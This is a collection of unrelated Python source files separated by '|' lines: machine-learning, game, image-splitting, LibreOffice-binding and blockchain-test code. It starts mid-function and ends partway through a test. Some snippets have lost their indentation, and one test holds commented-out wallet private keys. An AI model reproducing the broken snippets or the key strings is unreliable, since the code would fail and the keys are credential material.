            return [tf.add(i, 1), Xemb, tf.concat([H, toConcat], axis=0), _length]
        loop_vars = [i, Xemb, H, _length]
        # H grows by one row per step, so its leading dimension is unknown.
        shape_invariants = [i.get_shape(), Xemb.get_shape(), tf.TensorShape([None, self.hidden_dim]), _length.get_shape()]
        _, _, H, _ = tf.while_loop(cond, body, loop_vars=loop_vars, shape_invariants=shape_invariants)
        if X_train is None:
            pass
        else:
            # Keep only the test row's hidden state when predicting one row.
            H = tf.cond(tf.equal(length, 1), lambda: tf.reshape(H[-1, :], [1,-1]), lambda: H)
        return tf.matmul(H, self.Wout) + self.bout
|
import pygame
from shootingspacejetgame.res import *
class enemy(pygame.sprite.Sprite):
    """Enemy sprite that scrolls down the screen and can be shot."""

    def __init__(self, origin, jdg):
        super().__init__()
        sprite = pygame.image.load(ENEMY_IMG)
        sprite = pygame.transform.scale(sprite, ENEMY_SCALE)
        self.image = pygame.transform.rotate(sprite, 180)
        self.rect = self.image.get_rect()
        self.rect.center = origin
        self.valid = True
        self.jdg = jdg

    def shotCollided(self, fire, surface):
        """Return True (and award a point) when `fire` lies fully inside this sprite."""
        inside_x = self.rect.left <= fire.rect.left and fire.rect.right <= self.rect.right
        inside_y = self.rect.top <= fire.rect.top and fire.rect.bottom <= self.rect.bottom
        if inside_x and inside_y:
            self.jdg.addPoints()
            return True
        return False

    def update(self):
        """Move downward; flag the sprite invalid once its top passes the screen height."""
        if self.rect.top < SCREEN_HEIGHT:
            self.rect.move_ip(0, DY_ENEMY)
        else:
            self.valid = False

    def draw(self, surface):
        surface.blit(self.image, self.rect)

    def move(self, surface):
        """Convenience: advance one step and draw onto `surface`."""
        self.update()
        self.draw(surface)
|
import numpy as np
from sklearn import linear_model
from sklearn.metrics import mean_squared_error, mean_absolute_error, median_absolute_error, r2_score
class FeaturesExtractor():
    """Extracts per-gesture feature dictionaries from a gestures DataFrame.

    Gestures with missing timestamps (-1) or non-positive duration are
    dropped. Swipes shorter than ``fake_swipes_limit`` are classified as
    "fake swipes" (units are whatever t_start/t_stop use -- TODO confirm).
    """

    def __init__(self, gestures, fake_swipes_limit=30):
        # .copy() so that adding the "duration" column below does not write
        # into a view of the caller's frame (pandas SettingWithCopyWarning).
        gestures = gestures[(gestures["t_stop"] != -1) & (gestures["t_start"] != -1)].copy()
        gestures["duration"] = gestures["t_stop"] - gestures["t_start"]
        gestures = gestures[(gestures["duration"] > 0)]
        self.taps = gestures[(gestures["type"] == "tap")]
        self.swipes = gestures[(gestures["type"] == "swipe") & (gestures["duration"] >= fake_swipes_limit)]
        self.fake_swipes = gestures[(gestures["type"] == "swipe") & (gestures["duration"] < fake_swipes_limit)]
        print("\n==== Gestures Stats ====")
        print("Taps: ", len(self.taps.index))
        print("Swipes: ", len(self.swipes.index))
        print("Fake swipes: ", len(self.fake_swipes.index), "\n")

    def get_tap_features(self, tap):
        """Return the feature dict for a single tap gesture."""
        info = {}
        info["type"] = "tap"
        info["horizontal_position"] = tap["data"][0]["x0"]
        info["vertical_position"] = tap["data"][0]["y0"]
        return info

    def get_swipe_features(self, swipe):
        """Return the feature dict for a single swipe gesture."""
        info = {}
        info["type"] = "swipe"
        # Reconstruct evenly spaced timestamps for the touch samples, then
        # shift them so they start at 0.
        times = []
        num_data = len(swipe["data"])+1
        if(num_data==2):
            times.append(swipe["t_start"])
            times.append(swipe["t_stop"])
        elif(num_data>2):
            step = (swipe["t_stop"]-swipe["t_start"])/(num_data-1)
            times.append(swipe["t_start"])
            prev = swipe["t_start"]
            for i in range(0,num_data-2):
                times.append(prev+step)
                prev += step
            times.append(swipe["t_stop"])
        times = [t - swipe["t_start"] for t in times]
        x_positions = []
        y_positions = []
        # Get horizontal and vertical starting points
        x_positions.append(swipe["data"][0]["x0"])
        y_positions.append(swipe["data"][0]["y0"])
        for d in swipe["data"]:
            x_positions.append(d["moveX"])
            y_positions.append(d["moveY"])
        horizontal_length = x_positions[-1] - x_positions[0]
        vertical_length = y_positions[-1] - y_positions[0]
        info["horizontal_trace_length"] = np.abs(horizontal_length)
        info["vertical_trace_length"] = np.abs(vertical_length)
        # Dominant direction is the axis with the larger displacement.
        # NOTE(review): positive vertical delta is labelled "up"; in screen
        # coordinates y usually grows downward -- confirm the intent.
        if(np.abs(horizontal_length)>np.abs(vertical_length)):
            if(horizontal_length>0):
                info["direction"] = "right"
            else:
                info["direction"] = "left"
        else:
            if(vertical_length>0):
                info["direction"] = "up"
            else:
                info["direction"] = "down"
        # Get statistics of trace
        info["trace_stats"] = self.perform_linear_regression(x_positions, y_positions)
        # Average acceleration = velocity change / duration (duration scaled by 0.001).
        info["swipe_horizontal_acceleration"] = (swipe["data"][-1]["vx"] - swipe["data"][0]["vx"])/((swipe["t_stop"] - swipe["t_start"])*0.001)
        info["swipe_vertical_acceleration"] = (swipe["data"][-1]["vy"] - swipe["data"][0]["vy"])/((swipe["t_stop"] - swipe["t_start"])*0.001)
        # sum()/len() replaces the manual accumulation loops (same left-to-
        # right addition order, so float results are unchanged).
        info["mean_x"] = sum(x_positions) / len(x_positions)
        info["mean_y"] = sum(y_positions) / len(y_positions)
        return info

    def get_fake_swipe_features(self, fake_swipe):
        """Return the feature dict for a swipe too short to be a real swipe."""
        info = {}
        info["type"] = "fake_swipe"
        info["fs_horizontal_position"] = fake_swipe["data"][0]["x0"]
        info["fs_vertical_position"] = fake_swipe["data"][0]["y0"]
        return info

    def calculate_features(self):
        """Return the feature dicts of all taps, swipes and fake swipes."""
        features = []
        for ind in self.taps.index:
            features.append(self.get_tap_features(self.taps.loc[ind]))
        for ind in self.swipes.index:
            features.append(self.get_swipe_features(self.swipes.loc[ind]))
        for ind in self.fake_swipes.index:
            features.append(self.get_fake_swipe_features(self.fake_swipes.loc[ind]))
        return features

    def perform_linear_regression(self, x_pos, y_pos):
        """Fit y ~ x with OLS and return slope plus goodness-of-fit metrics."""
        x_train = np.array(x_pos).reshape(-1, 1)
        y_train = np.array(y_pos).reshape(-1, 1)
        # Create linear regression object
        regr = linear_model.LinearRegression()
        # Train the model using the training sets
        regr.fit(x_train, y_train)
        # Predict based on the constructed model
        pred = regr.predict(x_train)
        info = {}
        info["slope"] = regr.coef_[0][0]
        info["mean_squared_error"] = mean_squared_error(y_train, pred)
        info["mean_abs_error"] = mean_absolute_error(y_train, pred)
        info["median_abs_error"] = median_absolute_error(y_train, pred)
        info["coef_determination"] = r2_score(y_train, pred)
        return info
|
def html_it():
    """Run coverage and make an HTML report for main."""
    import coverage
    cov = coverage.coverage()
    cov.start()
    import main # pragma: nested
    cov.stop() # pragma: nested
    cov.html_report(directory="../html_omit_1")

# Farm-test driver: run html_it inside src/, compare the generated report
# against the gold files (tolerating small size differences), then clean up.
runfunc(html_it, rundir="src")
compare("gold_omit_1", "html_omit_1", size_within=10, file_pattern="*.html")
clean("html_omit_1")
|
import cv2 as cv
def model_ssd_inception_v2_coco():
    """Load the SSD Inception V2 COCO detector and its class names.

    Returns:
        (class_names, model): the COCO label strings read from
        models/coco_labels.txt, and a cv.dnn_DetectionModel configured for
        300x300 input, 1/255 scaling and BGR->RGB channel swap.
    """
    pretrained = "models/ssd_inception_v2_coco.pb"   # frozen TF weights
    proto = "models/ssd_inception_v2_coco.pbtxt"     # graph config
    labels = "models/coco_labels.txt"                # one label per line
    class_names = []
    with open(labels) as f:
        class_names = [cname.strip() for cname in f.readlines()]
    net = cv.dnn.readNetFromTensorflow(pretrained, proto)
    model = cv.dnn_DetectionModel(net)
    model.setInputParams(size=(300, 300), scale=1 / 255, swapRB=True)
    return class_names, model
|
import os
# Walk a directory tree and report every file whose name contains the
# search term, printing its path, name, extension and (formatted) size.
caminho = input('digite um caminho de pasta: ')
conta = 0
termo_procura = input('digite o que procura: ')
from formataTamanho import formata_tamanho
for raiz, diretorios, arquivos in os.walk(caminho):
    for arquivo in arquivos:
        if termo_procura in arquivo:
            try:
                conta += 1
                caminho_completo = os.path.join(raiz, arquivo)  # full path of the matching file
                nome_arquivo, ext_arquivo = os.path.splitext(arquivo)
                tamanho = os.path.getsize(caminho_completo)  # file size in bytes
                print('\nEncontrei o arquivo:', arquivo)
                print('caminho: ', caminho_completo)
                print('Nome: ', nome_arquivo)
                print('Extenção: ', ext_arquivo)
                print('Tamanho', tamanho)
                print('Tamanho formatado', formata_tamanho(tamanho))
            except PermissionError as e:
                print('Sem permissao para acessar a pasta')
            except FileNotFoundError as e:
                print('Arquivo nao encontrado')
            except Exception as e:
                print('Erro desconhecido: ', e)
print(f'{conta} arquivos encontrados')
|
# coding: utf-8
#
# Copyright 2022 :Barry-Thomas-Paul: Moss
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http: // www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Interface Class
# this is a auto generated file generated by Cheetah
# Libre Office Version: 7.3
# Namespace: com.sun.star.sdbcx
from abc import abstractmethod
from ..uno.x_interface import XInterface as XInterface_8f010a43
class XRowLocate(XInterface_8f010a43):
    """
    is used to identify rows within a result set and to find rows by a bookmark.

    Bookmarks are only valid in the scope of the current result set and are not interchangeable between result sets. A bookmark could be a complex data structure, so it could not be compared in a safe way. Because of that, a provider has to implement the compare method for bookmarks.

    See Also:
        `API XRowLocate <https://api.libreoffice.org/docs/idl/ref/interfacecom_1_1sun_1_1star_1_1sdbcx_1_1XRowLocate.html>`_
    """
    __ooo_ns__: str = 'com.sun.star.sdbcx'
    __ooo_full_ns__: str = 'com.sun.star.sdbcx.XRowLocate'
    __ooo_type_name__: str = 'interface'
    __pyunointerface__: str = 'com.sun.star.sdbcx.XRowLocate'

    @abstractmethod
    def compareBookmarks(self, first: object, second: object) -> int:
        """
        compares two bookmarks and returns an indication of their relative values.

        The bookmarks must apply to the same ResultSet. You cannot reliably compare bookmarks from different ResultSets, even if they were created from the same source or statement.

        A bookmark that is not valid, or incorrectly formed, will cause an exception.

        Returns:
            int: an indication of the bookmarks' relative ordering.

        Raises:
            com.sun.star.sdbc.SQLException: ``SQLException``
        """
    @abstractmethod
    def getBookmark(self) -> object:
        """
        returns the bookmark of the current row of a result set.

        Returns:
            object: the bookmark identifying the current row.

        Raises:
            com.sun.star.sdbc.SQLException: ``SQLException``
        """
    @abstractmethod
    def hasOrderedBookmarks(self) -> bool:
        """
        determines whether the bookmarks of a result set are ordered or not.

        Returns:
            bool: True when bookmarks are ordered.

        Raises:
            com.sun.star.sdbc.SQLException: ``SQLException``
        """
    @abstractmethod
    def hashBookmark(self, bookmark: object) -> int:
        """
        returns the hash value for a specified bookmark.

        Returns:
            int: the bookmark's hash value.

        Raises:
            com.sun.star.sdbc.SQLException: ``SQLException``
        """
    @abstractmethod
    def moveRelativeToBookmark(self, bookmark: object, rows: int) -> bool:
        """
        moves the cursor a relative number of rows, either positive or negative starting at a given bookmark position.

        If the bookmark could not be located, a result set will be positioned after the last record.

        If the bookmark is invalid, or not generated by the current result set, then the behavior is not defined, even an abnormal termination is possible.

        Returns:
            bool: whether the move succeeded.

        Raises:
            com.sun.star.sdbc.SQLException: ``SQLException``
        """
    @abstractmethod
    def moveToBookmark(self, bookmark: object) -> bool:
        """
        moves the cursor to the row identified by a valid bookmark.

        If the bookmark could not be located, a result set will be positioned after the last record.

        If the bookmark is invalid, or not generated by the current result set, then the behavior is not defined, even an abnormal termination is possible.

        Returns:
            bool: whether the move succeeded.

        Raises:
            com.sun.star.sdbc.SQLException: ``SQLException``
        """
__all__ = ['XRowLocate']
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2021 4Paradigm
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -*- coding: utf-8 -*-
import time
from testcasebase import TestCaseBase
from libs.deco import *
from libs.test_loader import load
import libs.utils as utils
from libs.logger import infoLogger
@multi_dimension(True)
class TestShowTablet(TestCaseBase):
    def test_showtablet_healthy(self):
        """
        Healthy tablet nodes report status kTabletHealthy.
        :return:
        """
        rs1 = self.showtablet(self.ns_leader)
        infoLogger.info(rs1)
        self.assertEqual(rs1[self.leader][0], 'kTabletHealthy')
        self.assertEqual(rs1[self.slave1][0], 'kTabletHealthy')
        self.assertEqual(rs1[self.slave2][0], 'kTabletHealthy')
    def test_showtablet_offline(self):
        """
        A stopped node reports kTabletOffline and returns to
        kTabletHealthy after being restarted.
        :return:
        """
        self.stop_client(self.slave1)
        # Give the nameserver time to notice the stopped tablet.
        time.sleep(10)
        rs1 = self.showtablet(self.ns_leader)
        infoLogger.info(rs1)
        self.assertEqual(rs1[self.leader][0], 'kTabletHealthy')
        self.assertEqual(rs1[self.slave1][0], 'kTabletOffline')
        self.assertEqual(rs1[self.slave2][0], 'kTabletHealthy')
        self.start_client(self.slave1)
        # Give the restarted tablet time to re-register as healthy.
        time.sleep(5)
        rs2 = self.showtablet(self.ns_leader)
        self.assertEqual(rs2[self.slave1][0], 'kTabletHealthy')
if __name__ == "__main__":
load(TestShowTablet)
|
''' A module for demonstrating exceptions '''
def convert(s):
    """Convert ``s`` to an integer, returning -1 when conversion fails."""
    try:
        x = int(s)
    except ValueError:
        # Value cannot be parsed as an integer (e.g. "abc").
        x = -1
        print("Conversion is failed!")
    except TypeError:
        # Value is of a type int() does not accept (e.g. a list).
        x = -1
        print("Conversion failed. Wrong Type!")
    else:
        print("Conversion is successful!")
    return x

if __name__ == "__main__":
    print("Convert String to int", convert("10"))
    print("Convert String to int", convert([1, 2, 3, 4]))
|
import os
from types import SimpleNamespace
config = SimpleNamespace()
def setup(args):
global config
config.in_folder = args.in_folder
config.out_folder = args.out_folder
config.tmp_folder = "{}_tmp".format(args.in_folder)
config.labels_folder = "{}_labels".format(args.in_folder)
config.stops_file = "{}/stops.co".format(config.tmp_folder)
config.nodes_file = "{}/nodes.co".format(config.out_folder)
config.edges_file = "{}/edges.gr".format(config.out_folder)
if not os.path.exists(config.out_folder):
os.makedirs(config.out_folder)
if not os.path.exists(config.tmp_folder):
os.makedirs(config.tmp_folder)
|
# coding=utf-8
"""
Wrapper for sub images that form part of a larger volume
Author: Tom Doel
Copyright UCL 2017
"""
import copy
import os
import numpy as np
from imagesplit.file.format_factory import FormatFactory
from imagesplit.file.metaio_reader import load_mhd_header
from imagesplit.image.combined_image import Axis
from imagesplit.utils.json_reader import write_json, read_json
from imagesplit.utils.utilities import ranges_for_max_block_size, \
convert_to_array
class SubImageRanges(object):
    """Convert per-axis range arrays into image geometry parameters.

    Each entry of ``ranges`` is ``[start, end, roi_offset_start,
    roi_offset_end]`` with inclusive start/end coordinates.
    """
    def __init__(self, ranges):
        self.ranges = ranges
        self.origin_start = [axis_range[0] for axis_range in ranges]
        self.origin_end = [axis_range[1] for axis_range in ranges]
        # +1 because both endpoints are inclusive.
        self.image_size = [1 + axis_range[1] - axis_range[0] for axis_range in ranges]
        self.roi_start = [axis_range[0] + axis_range[2] for axis_range in ranges]
        self.roi_end = [axis_range[1] - axis_range[3] for axis_range in ranges]
        self.roi_size = [1 + (axis_range[1] - axis_range[3]) - (axis_range[0] + axis_range[2])
                         for axis_range in ranges]

    def __eq__(self, other):
        if not isinstance(other, self.__class__):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not self.__eq__(other)
class GlobalImageDescriptor(object):
    """Describes a full combined image: size, format, dtype and axis order."""
    def __init__(self, size, file_format, dim_order_condensed, data_type, msb,
                 voxel_size):
        self.data_type = data_type
        self.file_format = file_format
        self.size = size
        self.num_dims = len(size)
        # msb: most-significant-byte-first flag (byte order of the data).
        self.msb = msb
        # Default to the identity condensed order 1..num_dims when none given.
        dim_order = dim_order_condensed if dim_order_condensed \
            else np.arange(1, self.num_dims + 1).tolist()
        self.axis = Axis.from_condensed_format(dim_order)
        self.voxel_size = voxel_size
    def __eq__(self, other):
        # Value equality: all attributes must match and types must agree.
        if isinstance(other, self.__class__):
            return self.__dict__ == other.__dict__
        return False
    def __ne__(self, other):
        return not self.__eq__(other)
class SubImageDescriptor(object):
    """Describes an image in relation to a larger combined image.

    Holds the file location, format and data type of one subimage plus
    the ranges it occupies within the combined volume and its local
    dimension ordering.
    """
    # pylint: disable=too-many-instance-attributes
    # pylint: disable=too-many-arguments
    def __init__(self, filename, file_format, data_type,
                 template, ranges, dim_order_condensed, suffix, index, msb,
                 compression, voxel_size):
        self.suffix = suffix
        self.index = index
        self.filename = filename
        self.file_format = file_format
        self.data_type = data_type
        self.template = template
        # Raw range arrays are wrapped to expose derived geometry
        self.ranges = SubImageRanges(ranges)
        self.axis = Axis.from_condensed_format(dim_order_condensed)
        self.msb = msb
        self.compression = compression
        self.voxel_size = voxel_size

    def get_local_size(self):
        """Transpose the subimage size to the local coordinate system"""
        return np.take(self.ranges.image_size, self.axis.dim_order).tolist()

    def get_local_origin(self):
        """Transpose the subimage origin to the local coordinate system"""
        return np.take(self.ranges.origin_start, self.axis.dim_order).tolist()

    def get_local_voxel_size(self):
        """Transpose the subimage voxel size to the local coordinate system"""
        return np.take(self.voxel_size, self.axis.dim_order).tolist()

    @staticmethod
    def from_dict(descriptor_dict):
        """Create SubImageDescriptor from dictionary entries"""
        return SubImageDescriptor(
            filename=descriptor_dict["filename"],
            file_format=descriptor_dict["file_format"],
            data_type=descriptor_dict["data_type"],
            template=descriptor_dict["template"],
            ranges=descriptor_dict["ranges"],
            dim_order_condensed=descriptor_dict["dim_order"],
            suffix=descriptor_dict["suffix"],
            index=descriptor_dict["index"],
            msb=descriptor_dict["msb"],
            compression=descriptor_dict["compression"],
            voxel_size=descriptor_dict["voxel_size"],
        )

    def to_dict(self):
        """Get a dictionary for the metadata for this subimage"""
        # Inverse of from_dict: axis is stored back in condensed form and
        # the raw (unwrapped) range arrays are serialised
        return {"index": self.index,
                "suffix": self.suffix,
                "filename": self.filename,
                "data_type": self.data_type,
                "file_format": self.file_format,
                "template": self.template,
                "dim_order": self.axis.to_condensed_format(),
                "compression": self.compression,
                "msb": self.msb,
                "voxel_size": self.voxel_size,
                "ranges": self.ranges.ranges}

    def __eq__(self, other):
        if isinstance(other, self.__class__):
            return self.__dict__ == other.__dict__
        return False

    def __ne__(self, other):
        return not self.__eq__(other)
def write_descriptor_file(descriptors_in, descriptors_out, filename_out_base,
                          test=False):
    """Save a descriptor file recording the source and split images.

    The file is written as ``<filename_out_base>_info.imagesplit``. When
    test is True the descriptor is assembled but nothing is written.
    """
    source_files = convert_to_dict(descriptors_in)
    split_files = convert_to_dict(descriptors_out)
    contents = {"appname": "ImageSplit data",
                "version": "1.0",
                "split_files": split_files,
                "source_files": source_files}
    if not test:
        write_json(filename_out_base + "_info.imagesplit", contents)
# pylint: disable=too-many-arguments
def generate_output_descriptors(filename_out_base,
                                max_block_size_voxels,
                                overlap_size_voxels,
                                dim_order,
                                header,
                                output_type,
                                num_dims,
                                output_file_format,
                                image_size,
                                msb,
                                compression,
                                voxel_size):
    """Create one SubImageDescriptor per output subimage file."""
    block_size = convert_to_array(max_block_size_voxels, "block size",
                                  num_dims)
    overlap = convert_to_array(overlap_size_voxels, "overlap size", num_dims)
    ranges = ranges_for_max_block_size(image_size, block_size, overlap)
    extension = FormatFactory.get_extension_for_format(output_file_format)
    # A single output file gets no numeric suffix
    single_file = len(ranges) <= 1
    descriptors_out = []
    for index, subimage_range in enumerate(ranges):
        suffix = "" if single_file else "_" + '{0:04d}'.format(index)
        descriptors_out.append(SubImageDescriptor(
            filename=filename_out_base + suffix + extension,
            file_format=output_file_format,
            ranges=subimage_range,
            suffix=suffix,
            index=index,
            dim_order_condensed=dim_order,
            data_type=output_type,
            # Each descriptor gets its own copy of the header template
            template=copy.deepcopy(header),
            msb=msb,
            compression=compression,
            voxel_size=voxel_size))
    return descriptors_out
def load_descriptor(descriptor_filename):
    """Load and validate an ImageSplit descriptor file from disk."""
    data = read_json(descriptor_filename)
    # Validate identity first, then version, so the error message matches
    # the first field that fails
    checks = (("appname", "ImageSplit data", 'Not an ImageSplit file'),
              ("version", "1.0", 'Cannot read this file version'))
    for key, required_value, message in checks:
        if data[key] != required_value:
            raise ValueError(message)
    return data
def header_from_descriptor(descriptor_filename, filename_override):
    """Create a file header based on descriptor information.

    Returns (original_header, descriptors, global_descriptor). When
    filename_override is set, the split-file names are rebuilt from the
    override base name plus each file's stored suffix.
    """
    descriptor = load_descriptor(descriptor_filename)
    original_file_list = descriptor["source_files"]
    if len(original_file_list) != 1:
        raise ValueError(
            'This function only supports data derived from a single file')
    original_file_descriptor = original_file_list[0]
    file_format = FormatFactory.simplify_format(
        original_file_descriptor["file_format"])
    if file_format == "mhd":
        original_header = load_mhd_header(original_file_descriptor["filename"])
    else:
        # Non-mhd source formats have no header loader yet
        original_header = None  # ToDo
    input_file_list = descriptor["split_files"]
    if filename_override:
        input_file_base, extension = os.path.splitext(filename_override)
        # Rewrites the filename entries in-place in the loaded descriptor
        for input_file in input_file_list:
            filename = input_file_base + input_file["suffix"] + extension
            input_file["filename"] = filename
    descriptors = convert_to_descriptors(input_file_list)
    global_descriptor = _aggregate_global_descriptor(descriptors)
    return original_header, descriptors, global_descriptor
def generate_input_descriptors(input_file, start_index):
    """Create descriptors for one or more input files that do not have a
    descriptor file.

    If start_index is None a single file is loaded; otherwise a
    zero-padded numbered series starting at start_index is located and
    the volumes are concatenated along the third dimension. Returns
    (combined_header, descriptors, global_descriptor).
    """
    format_factory = FormatFactory()
    input_file_base, extension = os.path.splitext(input_file)
    descriptors = []
    current_ranges = None
    combined_header = None
    full_image_size = None
    if start_index is None:
        # If no start index is specified, load a single header file
        file_index = 0
        format_str = ""
    else:
        # Load a series of files starting with the specified prefix
        file_index = start_index
        format_str = _get_format_string(extension, input_file_base, start_index)
    # With an empty format_str this reduces to the single input filename
    suffix = format_str.format(start_index)
    header_filename = input_file_base + suffix + extension
    if not os.path.isfile(header_filename):
        raise ValueError(
            'No file series found starting with ' + header_filename)
    # Loop through all the input files
    while True:
        file_descriptor, current_header = parse_header(header_filename,
                                                       format_factory)
        data_type = file_descriptor.data_type
        dim_order = file_descriptor.dim_order
        file_format = file_descriptor.file_format
        current_image_size = file_descriptor.image_size
        voxel_size = file_descriptor.voxel_size
        msb = file_descriptor.msb
        compression = file_descriptor.compression
        # Reorder image size and voxel size dimensions into global order
        axis = Axis.from_condensed_format(dim_order)
        current_image_size = \
            np.take(current_image_size, axis.reverse_dim_order).tolist()
        voxel_size = np.take(voxel_size, axis.reverse_dim_order).tolist()
        if not current_ranges:
            # First file: ranges cover the whole of that file's volume.
            # NOTE(review): assumes 3-dimensional images — confirm
            full_image_size = copy.deepcopy(current_image_size)
            combined_header = copy.deepcopy(current_header)
            current_ranges = [[0, current_image_size[0] - 1, 0, 0],
                              [0, current_image_size[1] - 1, 0, 0],
                              [0, current_image_size[2] - 1, 0, 0]]
        else:
            # For multiple input files, concatenate volumes
            if current_image_size[0] != full_image_size[0]:
                raise ValueError(
                    'When loading without a descriptor file, the first '
                    'dimension of each file must '
                    'match')
            if current_image_size[1] != full_image_size[1]:
                raise ValueError(
                    'When loading without a descriptor file, the second '
                    'dimension of each file must '
                    'match')
            full_image_size[2] = full_image_size[2] + current_image_size[2]
            # Shift the third-dimension range to follow the previous file
            current_ranges[2][0] = current_ranges[2][1] + 1
            current_ranges[2][1] = current_ranges[2][1] + \
                current_image_size[2]
        # Create a descriptor for this subimage
        ranges_to_write = copy.deepcopy(current_ranges)
        descriptors.append(SubImageDescriptor(
            index=file_index,
            suffix=suffix,
            filename=header_filename,
            ranges=ranges_to_write,
            template=combined_header,
            data_type=data_type,
            dim_order_condensed=dim_order,
            file_format=file_format,
            msb=msb,
            compression=compression,
            voxel_size=voxel_size
        ))
        if start_index is None:  # pylint: disable=no-else-break
            # Single file already loaded, so terminate the while True loop
            break
        else:
            # Search for next file, and if not found terminate the loop
            file_index += 1
            suffix = format_str.format(file_index)
            header_filename = input_file_base + suffix + extension
            if not os.path.isfile(header_filename):
                break
    full_image_size = np.array(full_image_size).tolist()
    global_descriptor = _aggregate_global_descriptor(descriptors)
    # Update the combined image size
    combined_header["DimSize"] = full_image_size
    # Update voxel size
    # NOTE(review): this is the voxel size of the *last* file read —
    # confirm all files in a series share the same voxel size
    combined_header["ElementSize"] = voxel_size
    return combined_header, descriptors, global_descriptor
def _aggregate_global_descriptor(descriptors):
    """Compute a GlobalImageDescriptor covering all subimage descriptors.

    The global image extent is the bounding box of all subimage ranges;
    format, dimension ordering, data type, endianness and voxel size are
    taken from the first descriptor in the list.
    """
    global_ranges = None
    combined_dim_order = None
    combined_file_format = None
    data_type = None
    msb = None
    voxel_size = None
    for descriptor in descriptors:
        current_ranges = descriptor.ranges.ranges
        if global_ranges is None:
            global_ranges = copy.deepcopy(current_ranges)
        else:
            # Expand the bounding box along each of the three dimensions
            for dim in range(3):
                global_ranges[dim][0] = min(global_ranges[dim][0],
                                            current_ranges[dim][0])
                global_ranges[dim][1] = max(global_ranges[dim][1],
                                            current_ranges[dim][1])
        if combined_file_format is None:
            combined_file_format = descriptor.file_format
        if combined_dim_order is None:
            combined_dim_order = descriptor.axis.to_condensed_format()
        if data_type is None:
            data_type = descriptor.data_type
        if msb is None:
            # Must test `is None`, not truthiness: msb=False
            # (little-endian) is a valid value and previously would have
            # been overwritten by a later descriptor's msb=True
            msb = descriptor.msb
        if voxel_size is None:
            voxel_size = copy.deepcopy(descriptor.voxel_size)
    # Ranges are inclusive, hence the +1
    full_image_size = [global_ranges[dim][1] - global_ranges[dim][0] + 1
                       for dim in range(3)]
    return GlobalImageDescriptor(
        size=full_image_size,
        file_format=combined_file_format,
        dim_order_condensed=combined_dim_order,
        data_type=data_type,
        msb=msb,
        voxel_size=voxel_size)
def convert_to_descriptors(descriptors_dict):
    """Convert descriptor dictionaries to SubImageDescriptor objects,
    ordered by their subimage index."""
    ordered = sorted(descriptors_dict, key=lambda entry: entry['index'])
    return [SubImageDescriptor.from_dict(entry) for entry in ordered]
def convert_to_dict(descriptors):
    """Convert SubImageDescriptor objects to a list of metadata dicts."""
    serialised = []
    for descriptor in descriptors:
        serialised.append(descriptor.to_dict())
    return serialised
def parse_header(filename, factory):
    """Read metadata from any supported header file type.

    The file extension selects the format-specific factory used to load
    and parse the header.
    """
    extension = os.path.splitext(filename)[1]
    file_format = factory.extension_to_format(extension)
    format_factory = factory.get_factory(file_format)
    return format_factory.load_and_parse_header(filename)
def _get_format_string(extension, input_file_base, start_index):
for num_zeros in range(10, -1, -1):
format_str = '{0:0' + str(num_zeros) + 'd}'
suffix_test = format_str.format(start_index)
header_filename = input_file_base + suffix_test + extension
if os.path.isfile(header_filename):
break
return format_str
|
# -*- coding:utf-8 -*-
from .printsirhead import printsirhead
from .loadsir import loadsir
from .extractsirhead import extractsirhead
from .sirutils import parseFilename
from .sirutils import fn2dt
from .latlon2pix import latlon2pix
from .ease2helper import ease2_map_info, easeconv_normalize_degrees
|
# use subprocess.call to run external file
# which in this case is input_output, a test Rust file
import subprocess
# Launches ./input_output from the current working directory and blocks
# until it exits; stdin/stdout are inherited from this process.
# NOTE(review): the return code is discarded — confirm failures of the
# external binary are acceptable here.
subprocess.call(["./input_output"])
|
import os
import sys
import time
import json
import pytest
import logging
import hashlib
from uuoskit import uuosapi, config, wallet
from uuoskit.chainapi import ChainApiAsync
from uuoskit.exceptions import ChainException, WalletException
from uuoskit.testnet import Testnet
# Prevent pytest from collecting the Testnet helper class as a test case
Testnet.__test__ = False
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)s %(lineno)d %(module)s %(message)s')
logger=logging.getLogger(__name__)
# Directory containing this test module
test_dir = os.path.dirname(__file__)
# config.main_token = 'UUOS'
# config.main_token_contract = 'uuos.token'
# config.system_contract = 'uuos'
# uuosapi.set_node('http://127.0.0.1:8899')
# config.setup_uuos_network()
# Module-level async chain API handle; (re)created before each test in
# TestUUOSApi.setup_method
uuosapi_async = None
class TestUUOSApi(object):
    """End-to-end tests for the uuoskit sync (`uuosapi`) and async
    (`ChainApiAsync`) chain APIs against a local single-node testnet."""

    @classmethod
    def setup_class(cls):
        """Start a single-node testnet and point both APIs at it."""
        # Fix: declare the module-level handle as global. Previously this
        # assignment created a dead function-local variable and the
        # module-level `uuosapi_async` stayed None until setup_method ran.
        global uuosapi_async
        uuosapi.set_node('http://127.0.0.1:9000')
        uuosapi_async = ChainApiAsync('http://127.0.0.1:9000')
        cls.testnet = Testnet(single_node=True, show_log=False)
        cls.testnet.run()
        cls.info = uuosapi.get_info()
        # logger.info(cls.info)
        cls.chain_id = cls.info['chain_id']
        # wallet.import_key('mywallet', '5K463ynhZoCDDa4RDcr63cUwWLTnKqmdcoTKTHBjqoKfv4u5V7p')
        # wallet.import_key('mywallet', '5Jbb4wuwz8MAzTB9FJNmrVYGXo4ABb7wqPVoWGcZ6x8V2FwNeDo')

    @classmethod
    def teardown_class(cls):
        """Stop the testnet and remove its working files."""
        cls.testnet.stop()
        cls.testnet.cleanup()

    def setup_method(self, method):
        # Recreate the async API before every test for isolation
        global uuosapi_async
        uuosapi_async = ChainApiAsync('http://127.0.0.1:9000')

    def teardown_method(self, method):
        pass

    def test_gen_transaction(self):
        """Transaction generation succeeds for valid args and raises for
        an action dict with an unknown field."""
        args = {
            'from': 'alice',
